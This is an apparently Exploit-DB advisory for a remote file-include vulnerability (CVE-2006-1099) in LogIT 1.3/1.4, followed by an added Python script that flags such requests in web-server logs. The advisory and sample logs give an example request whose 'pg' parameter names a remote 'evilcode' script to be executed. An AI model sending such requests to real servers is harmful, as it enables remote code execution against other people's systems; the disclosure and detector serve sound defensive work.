LogIT 1.3/1.4 - Remote File Include Vulnerability

2006-03-02T00:00:00
ID EDB-ID:27345
Type exploitdb
Reporter botan
Modified 2006-03-02T00:00:00

Description

LogIT 1.3/1.4 Remote File Include Vulnerability. CVE-2006-1099. Webapps exploit for the PHP platform.

                                        
Source: http://www.securityfocus.com/bid/16932/info

LogIT is prone to a remote file-include vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input.

Attackers may specify remotely hosted script files to be executed in the context of the webserver hosting the vulnerable software. An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the webserver process. 

LogIT versions 1.3 and 1.4 are affected by this vulnerability; other versions may also be affected.

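The following example request demonstrates the issue; the `pg` parameter carries the location of the remote script:

http://www.example.com/?pg=http://www.example2.com/evilcode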
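
A detection sketch for the request pattern above, added here as an example and not part of the original advisory or of LogIT: it scans web-server access-log lines for a `pg` value that names a remote resource instead of a local page. The log format, the sample lines (including the `stats` page name) and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that begins with a URL scheme ("http:", "ftp:", "php:", ...), a
# protocol-relative "//host" or a UNC "\\host" is not a local page name.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)', re.IGNORECASE)

PARAM = "pg"  # parameter name taken from the advisory's example URL


def remote_pg_values(log_line):
    """Return the decoded pg values in one log line that point off-host."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []  # not a request line this parser understands
    query = urlsplit(match.group(1)).query
    # parse_qsl percent-decodes, so "http%3A%2F%2F..." is seen as "http://..."
    return [value for name, value in parse_qsl(query, keep_blank_values=True)
            if name == PARAM and REMOTE_RE.match(value)]


def scan(lines):
    """Map line index -> flagged values, for every line with a hit."""
    hits = {}
    for index, line in enumerate(lines):
        values = remote_pg_values(line)
        if values:
            hits[index] = values
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Mar/2006:10:00:01 +0000] "GET /?pg=stats HTTP/1.1" 200 512',
    '192.0.2.44 - - [02/Mar/2006:10:00:07 +0000] '
    '"GET /?pg=http://www.example2.com/evilcode HTTP/1.1" 200 90',
    '192.0.2.44 - - [02/Mar/2006:10:00:09 +0000] '
    '"GET /?pg=http%3A%2F%2Fwww.example2.com%2Fevilcode HTTP/1.1" 200 90',
    '192.0.2.12 - - [02/Mar/2006:10:00:12 +0000] '
    '"GET /?page=2&ref=http://www.example.com/ HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for index, values in scan(SAMPLE_LOG).items():
        print(f"line {index}: pg -> {values}")
```

Only the `pg` parameter is inspected, so a URL in an unrelated parameter (the last sample line) is not flagged.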